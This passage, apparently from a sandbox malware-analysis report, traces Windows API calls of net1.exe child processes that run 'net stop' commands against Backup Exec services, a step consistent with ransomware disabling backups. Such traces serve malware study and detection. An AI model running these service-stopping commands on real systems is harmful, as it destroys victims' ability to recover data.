_DstBuf=0xefb98, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0090.853] setlocale (category=0, locale=".437") returned="English_United States.437" [0090.854] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0090.854] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0090.854] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecVSSProvider /y" [0090.854] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xef930, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0090.854] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0090.854] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xefb88 | out: Buffer=0xefb88*=0x134d60) returned 0x0 [0090.854] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xefb88 | out: Buffer=0xefb88*=0x13c130) returned 0x0 [0090.854] _fileno (_File=0x7fefdba2a80) returned 0 [0090.854] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0090.854] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0090.854] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0090.854] _wcsicmp (_String1="config", _String2="stop") returned -16 [0090.854] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0090.854] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0090.854] _wcsicmp (_String1="file", _String2="stop") returned -13 [0090.854] _wcsicmp (_String1="files", _String2="stop") returned -13 [0090.854] _wcsicmp (_String1="group", _String2="stop") returned -12 [0090.854] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0090.854] _wcsicmp (_String1="help", _String2="stop") returned -11 [0090.855] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0090.855] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0090.855] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0090.855] _wcsicmp (_String1="session", _String2="stop") returned -15 [0090.855] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0090.855] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0090.855] _wcsicmp (_String1="share", _String2="stop") returned -12 [0090.855] _wcsicmp (_String1="start", _String2="stop") returned -14 [0090.855] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0090.855] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0090.855] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0090.855] _wcsicmp (_String1="accounts", _String2="BackupExecVSSProvider") returned -1 [0090.855] _wcsicmp (_String1="computer", _String2="BackupExecVSSProvider") returned 1 [0090.855] _wcsicmp (_String1="config", _String2="BackupExecVSSProvider") returned 1 [0090.855] _wcsicmp (_String1="continue", _String2="BackupExecVSSProvider") returned 1 [0090.855] _wcsicmp (_String1="cont", _String2="BackupExecVSSProvider") returned 1 [0090.855] _wcsicmp (_String1="file", _String2="BackupExecVSSProvider") returned 4 [0090.855] _wcsicmp (_String1="files", _String2="BackupExecVSSProvider") returned 4 [0090.855] _wcsicmp (_String1="group", _String2="BackupExecVSSProvider") returned 5 [0090.855] _wcsicmp (_String1="groups", _String2="BackupExecVSSProvider") returned 5 [0090.855] _wcsicmp (_String1="help", _String2="BackupExecVSSProvider") returned 6 [0090.855] _wcsicmp (_String1="helpmsg", _String2="BackupExecVSSProvider") returned 6 [0090.855] _wcsicmp (_String1="localgroup", _String2="BackupExecVSSProvider") returned 10 [0090.855] _wcsicmp (_String1="pause", _String2="BackupExecVSSProvider") returned 14 [0090.855] _wcsicmp (_String1="session", _String2="BackupExecVSSProvider") returned 17 [0090.855] _wcsicmp (_String1="sessions", _String2="BackupExecVSSProvider") returned 17 [0090.855] _wcsicmp (_String1="sess", _String2="BackupExecVSSProvider") returned 17 [0090.855] _wcsicmp (_String1="share", _String2="BackupExecVSSProvider") returned 17 [0090.855] _wcsicmp (_String1="start", _String2="BackupExecVSSProvider") returned 17 [0090.855] _wcsicmp (_String1="stats", _String2="BackupExecVSSProvider") returned 17 [0090.855] _wcsicmp (_String1="statistics", _String2="BackupExecVSSProvider") returned 17 [0090.855] _wcsicmp (_String1="stop", _String2="BackupExecVSSProvider") returned 17 [0090.855] _wcsicmp (_String1="time", _String2="BackupExecVSSProvider") returned 18 [0090.855] _wcsicmp (_String1="user", _String2="BackupExecVSSProvider") returned 19 [0090.855] _wcsicmp (_String1="users", _String2="BackupExecVSSProvider") returned 19 [0090.855] _wcsicmp (_String1="msg", _String2="BackupExecVSSProvider") returned 11 [0090.855] _wcsicmp (_String1="messenger", _String2="BackupExecVSSProvider") returned 11 [0090.855] _wcsicmp (_String1="receiver", _String2="BackupExecVSSProvider") returned 16 [0090.855] _wcsicmp (_String1="rcv", _String2="BackupExecVSSProvider") returned 16 [0090.855] _wcsicmp (_String1="netpopup", _String2="BackupExecVSSProvider") returned 12 [0090.855] _wcsicmp (_String1="redirector", _String2="BackupExecVSSProvider") returned 16 [0090.856] _wcsicmp (_String1="redir", _String2="BackupExecVSSProvider") returned 16 [0090.856] _wcsicmp (_String1="rdr", _String2="BackupExecVSSProvider") returned 16 [0090.856] _wcsicmp (_String1="workstation", _String2="BackupExecVSSProvider") returned 21 [0090.856] _wcsicmp (_String1="work", _String2="BackupExecVSSProvider") returned 21 [0090.856] _wcsicmp (_String1="wksta", _String2="BackupExecVSSProvider") returned 21 [0090.856] _wcsicmp (_String1="prdr", _String2="BackupExecVSSProvider") returned 14 [0090.856] _wcsicmp (_String1="devrdr", _String2="BackupExecVSSProvider") returned 2 [0090.856] _wcsicmp (_String1="lanmanworkstation", _String2="BackupExecVSSProvider") returned 10 [0090.856] _wcsicmp (_String1="server", _String2="BackupExecVSSProvider") returned 17 [0090.856] _wcsicmp (_String1="svr", _String2="BackupExecVSSProvider") returned 17 [0090.856] _wcsicmp (_String1="srv", _String2="BackupExecVSSProvider") returned 17 [0090.856] _wcsicmp (_String1="lanmanserver", _String2="BackupExecVSSProvider") returned 10 [0090.856] _wcsicmp (_String1="alerter", _String2="BackupExecVSSProvider") returned -1 [0090.856] _wcsicmp (_String1="netlogon", _String2="BackupExecVSSProvider") returned 12 [0090.856] _wcsupr (in: _String="BackupExecVSSProvider" | out: _String="BACKUPEXECVSSPROVIDER") returned="BACKUPEXECVSSPROVIDER" [0090.856] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x13ce40 [0091.063] GetServiceKeyNameW (in: hSCManager=0x13ce40, lpDisplayName="BACKUPEXECVSSPROVIDER", lpServiceName=0xff9f5750, lpcchBuffer=0xefaa8 | out: lpServiceName="", lpcchBuffer=0xefaa8) returned 0 [0091.064] _wcsicmp (_String1="msg", _String2="BACKUPEXECVSSPROVIDER") returned 11 [0091.064] _wcsicmp (_String1="messenger", _String2="BACKUPEXECVSSPROVIDER") returned 11 [0091.064] _wcsicmp (_String1="receiver", _String2="BACKUPEXECVSSPROVIDER") returned 16 [0091.064] _wcsicmp (_String1="rcv", _String2="BACKUPEXECVSSPROVIDER") returned 16 [0091.064] _wcsicmp (_String1="redirector", _String2="BACKUPEXECVSSPROVIDER") returned 16 [0091.064] _wcsicmp (_String1="redir", _String2="BACKUPEXECVSSPROVIDER") returned 16 [0091.064] _wcsicmp (_String1="rdr", _String2="BACKUPEXECVSSPROVIDER") returned 16 [0091.064] _wcsicmp (_String1="workstation", _String2="BACKUPEXECVSSPROVIDER") returned 21 [0091.064] _wcsicmp (_String1="work", _String2="BACKUPEXECVSSPROVIDER") returned 21 [0091.064] _wcsicmp (_String1="wksta", _String2="BACKUPEXECVSSPROVIDER") returned 21 [0091.064] _wcsicmp (_String1="prdr", _String2="BACKUPEXECVSSPROVIDER") returned 14 [0091.064] _wcsicmp (_String1="devrdr", _String2="BACKUPEXECVSSPROVIDER") returned 2 [0091.064] _wcsicmp (_String1="lanmanworkstation", _String2="BACKUPEXECVSSPROVIDER") returned 10 [0091.064] _wcsicmp (_String1="server", _String2="BACKUPEXECVSSPROVIDER") returned 17 [0091.064] _wcsicmp (_String1="svr", _String2="BACKUPEXECVSSPROVIDER") returned 17 [0091.064] _wcsicmp (_String1="srv", _String2="BACKUPEXECVSSPROVIDER") returned 17 [0091.064] _wcsicmp (_String1="lanmanserver", _String2="BACKUPEXECVSSPROVIDER") returned 10 [0091.064] _wcsicmp (_String1="alerter", _String2="BACKUPEXECVSSPROVIDER") returned -1 [0091.064] _wcsicmp (_String1="netlogon", _String2="BACKUPEXECVSSPROVIDER") returned 12 [0091.065] NetServiceControl (in: servername=0x0, service="BACKUPEXECVSSPROVIDER", opcode=0x0, arg=0x0, bufptr=0xefab0 | out: bufptr=0xefab0) returned 0x889 [0091.065] wcscpy_s (in: _Destination=0xff9f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0091.065] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0091.066] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff9f5b50, nSize=0x800, Arguments=0xff9f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0091.067] GetFileType (hFile=0xb) returned 0x2 [0091.067] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef978 | out: lpMode=0xef978) returned 1 [0091.067] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xef970, lpReserved=0x0 | out: lpBuffer=0xff9f5b50*, lpNumberOfCharsWritten=0xef970*=0x1e) returned 1 [0091.067] GetFileType (hFile=0xb) returned 0x2 [0091.068] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef978 | out: lpMode=0xef978) returned 1 [0091.068] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xef970, lpReserved=0x0 | out: lpBuffer=0xff9d1efc*, lpNumberOfCharsWritten=0xef970*=0x2) returned 1 [0091.068] _ultow (in: _Dest=0x889, _Radix=981472 | out: _Dest=0x889) returned="2185" [0091.068] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff9f5b50, nSize=0x800, Arguments=0xff9f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0091.068] GetFileType (hFile=0xb) returned 0x2 [0091.068] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef978 | out: lpMode=0xef978) returned 1 [0091.069] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xef970, lpReserved=0x0 | out: lpBuffer=0xff9f5b50*, lpNumberOfCharsWritten=0xef970*=0x34) returned 1 [0091.069] GetFileType (hFile=0xb) returned 0x2 [0091.069] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef978 | out: lpMode=0xef978) returned 1 [0091.069] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xef970, lpReserved=0x0 | out: lpBuffer=0xff9d1efc*, lpNumberOfCharsWritten=0xef970*=0x2) returned 1 [0091.069] NetApiBufferFree (Buffer=0x134d60) returned 0x0 [0091.069] NetApiBufferFree (Buffer=0x13c130) returned 0x0 [0091.069] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecVSSProvider /y" [0091.069] exit (_Code=2) Process: id = "108" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x6422e000" os_pid = "0x1250" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "98" os_parent_pid = "0x1170" cmd_line = "C:\\Windows\\system32\\net1 stop BackupExecManagementService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5319 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5320 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5321 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5322 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 5323 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5324 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5325 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5326 start_va = 0xff9d0000 end_va = 0xffa02fff entry_point = 0xff9d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 5327 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5328 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5329 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 5330 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5331 start_va = 0x80000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 5332 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5333 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5334 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5335 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5336 start_va = 0x210000 end_va = 0x276fff entry_point = 0x210000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5337 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 5338 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 5339 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5340 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5341 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 5342 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5343 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 5344 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5345 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5346 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5347 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5348 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 5349 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 5350 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5351 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5352 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5353 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5354 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5355 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5356 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5412 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 511 os_tid = 0x1254 [0090.884] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f770 | out: lpSystemTimeAsFileTime=0x20f770*(dwLowDateTime=0xeb562d50, dwHighDateTime=0x1d48689)) [0090.884] GetCurrentProcessId () returned 0x1250 [0090.884] GetCurrentThreadId () returned 0x1254 [0090.884] GetTickCount () returned 0x208e5 [0090.884] QueryPerformanceCounter (in: lpPerformanceCount=0x20f778 | out: lpPerformanceCount=0x20f778*=1813780200000) returned 1 [0090.885] GetModuleHandleW (lpModuleName=0x0) returned 0xff9d0000 [0090.885] __set_app_type (_Type=0x1) [0090.885] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff9e9c9c) returned 0x0 [0090.886] __getmainargs (in: _Argc=0xff9f4780, _Argv=0xff9f4790, _Env=0xff9f4788, _DoWildCard=0, _StartInfo=0xff9f479c | out: _Argc=0xff9f4780, _Argv=0xff9f4790, _Env=0xff9f4788) returned 0 [0090.886] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0090.886] GetConsoleOutputCP () returned 0x1b5 [0090.886] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff9fcec0 | out: lpCPInfo=0xff9fcec0) returned 1 [0090.886] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0090.887] sprintf_s (in: _DstBuf=0x20f718, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0090.888] setlocale (category=0, locale=".437") returned="English_United States.437" [0090.889] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0090.889] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0090.889] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecManagementService /y" [0090.889] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20f4b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0090.889] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0090.889] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x20f708 | out: Buffer=0x20f708*=0x9c100) returned 0x0 [0090.889] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x20f708 | out: Buffer=0x20f708*=0x9c120) returned 0x0 [0090.889] _fileno (_File=0x7fefdba2a80) returned 0 [0090.889] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0090.889] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0090.889] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0090.889] _wcsicmp (_String1="config", _String2="stop") returned -16 [0090.889] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0090.889] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0090.889] _wcsicmp (_String1="file", _String2="stop") returned -13 [0090.889] _wcsicmp (_String1="files", _String2="stop") returned -13 [0090.889] _wcsicmp (_String1="group", _String2="stop") returned -12 [0090.889] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0090.890] _wcsicmp (_String1="help", _String2="stop") returned -11 [0090.890] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0090.890] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0090.890] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0090.890] _wcsicmp (_String1="session", _String2="stop") returned -15 [0090.890] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0090.890] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0090.890] _wcsicmp (_String1="share", _String2="stop") returned -12 [0090.890] _wcsicmp (_String1="start", _String2="stop") returned -14 [0090.890] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0090.890] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0090.890] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0090.890] _wcsicmp (_String1="accounts", _String2="BackupExecManagementService") returned -1 [0090.890] _wcsicmp (_String1="computer", _String2="BackupExecManagementService") returned 1 [0090.890] _wcsicmp (_String1="config", _String2="BackupExecManagementService") returned 1 [0090.890] _wcsicmp (_String1="continue", _String2="BackupExecManagementService") returned 1 [0090.890] _wcsicmp (_String1="cont", _String2="BackupExecManagementService") returned 1 [0090.890] _wcsicmp (_String1="file", _String2="BackupExecManagementService") returned 4 [0090.890] _wcsicmp (_String1="files", _String2="BackupExecManagementService") returned 4 [0090.890] _wcsicmp (_String1="group", _String2="BackupExecManagementService") returned 5 [0090.890] _wcsicmp (_String1="groups", _String2="BackupExecManagementService") returned 5 [0090.890] _wcsicmp (_String1="help", _String2="BackupExecManagementService") returned 6 [0090.890] _wcsicmp (_String1="helpmsg", _String2="BackupExecManagementService") returned 6 [0090.890] _wcsicmp (_String1="localgroup", _String2="BackupExecManagementService") returned 10 [0090.890] _wcsicmp (_String1="pause", _String2="BackupExecManagementService") returned 14 [0090.890] _wcsicmp (_String1="session", _String2="BackupExecManagementService") returned 17 [0090.890] _wcsicmp (_String1="sessions", _String2="BackupExecManagementService") returned 17 [0090.890] _wcsicmp (_String1="sess", _String2="BackupExecManagementService") returned 17 [0090.890] _wcsicmp (_String1="share", _String2="BackupExecManagementService") returned 17 [0090.890] _wcsicmp (_String1="start", _String2="BackupExecManagementService") returned 17 [0090.890] _wcsicmp (_String1="stats", _String2="BackupExecManagementService") returned 17 [0090.890] _wcsicmp (_String1="statistics", _String2="BackupExecManagementService") returned 17 [0090.890] _wcsicmp (_String1="stop", _String2="BackupExecManagementService") returned 17 [0090.890] _wcsicmp (_String1="time", _String2="BackupExecManagementService") returned 18 [0090.890] _wcsicmp (_String1="user", _String2="BackupExecManagementService") returned 19 [0090.890] _wcsicmp (_String1="users", _String2="BackupExecManagementService") returned 19 [0090.890] _wcsicmp (_String1="msg", _String2="BackupExecManagementService") returned 11 [0090.890] _wcsicmp (_String1="messenger", _String2="BackupExecManagementService") returned 11 [0090.890] _wcsicmp (_String1="receiver", _String2="BackupExecManagementService") returned 16 [0090.890] _wcsicmp (_String1="rcv", _String2="BackupExecManagementService") returned 16 [0090.890] _wcsicmp (_String1="netpopup", _String2="BackupExecManagementService") returned 12 [0090.890] _wcsicmp (_String1="redirector", _String2="BackupExecManagementService") returned 16 [0090.890] _wcsicmp (_String1="redir", _String2="BackupExecManagementService") returned 16 [0090.890] _wcsicmp (_String1="rdr", _String2="BackupExecManagementService") returned 16 [0090.890] _wcsicmp (_String1="workstation", _String2="BackupExecManagementService") returned 21 [0090.891] _wcsicmp (_String1="work", _String2="BackupExecManagementService") returned 21 [0090.891] _wcsicmp (_String1="wksta", _String2="BackupExecManagementService") returned 21 [0090.891] _wcsicmp (_String1="prdr", _String2="BackupExecManagementService") returned 14 [0090.891] _wcsicmp (_String1="devrdr", _String2="BackupExecManagementService") returned 2 [0090.891] _wcsicmp (_String1="lanmanworkstation", _String2="BackupExecManagementService") returned 10 [0090.891] _wcsicmp (_String1="server", _String2="BackupExecManagementService") returned 17 [0090.891] _wcsicmp (_String1="svr", _String2="BackupExecManagementService") returned 17 [0090.891] _wcsicmp (_String1="srv", _String2="BackupExecManagementService") returned 17 [0090.891] _wcsicmp (_String1="lanmanserver", _String2="BackupExecManagementService") returned 10 [0090.891] _wcsicmp (_String1="alerter", _String2="BackupExecManagementService") returned -1 [0090.891] _wcsicmp (_String1="netlogon", _String2="BackupExecManagementService") returned 12 [0090.891] _wcsupr (in: _String="BackupExecManagementService" | out: _String="BACKUPEXECMANAGEMENTSERVICE") returned="BACKUPEXECMANAGEMENTSERVICE" [0090.891] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x9ce30 [0091.070] GetServiceKeyNameW (in: hSCManager=0x9ce30, lpDisplayName="BACKUPEXECMANAGEMENTSERVICE", lpServiceName=0xff9f5750, lpcchBuffer=0x20f628 | out: lpServiceName="", lpcchBuffer=0x20f628) returned 0 [0091.071] _wcsicmp (_String1="msg", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 11 [0091.072] _wcsicmp (_String1="messenger", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 11 [0091.072] _wcsicmp (_String1="receiver", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 16 [0091.072] _wcsicmp (_String1="rcv", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 16 [0091.072] _wcsicmp (_String1="redirector", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 16 [0091.072] _wcsicmp (_String1="redir", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 16 [0091.072] _wcsicmp (_String1="rdr", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 16 [0091.072] _wcsicmp (_String1="workstation", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 21 [0091.072] _wcsicmp (_String1="work", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 21 [0091.072] _wcsicmp (_String1="wksta", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 21 [0091.072] _wcsicmp (_String1="prdr", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 14 [0091.072] _wcsicmp (_String1="devrdr", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 2 [0091.072] _wcsicmp (_String1="lanmanworkstation", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 10 [0091.072] _wcsicmp (_String1="server", 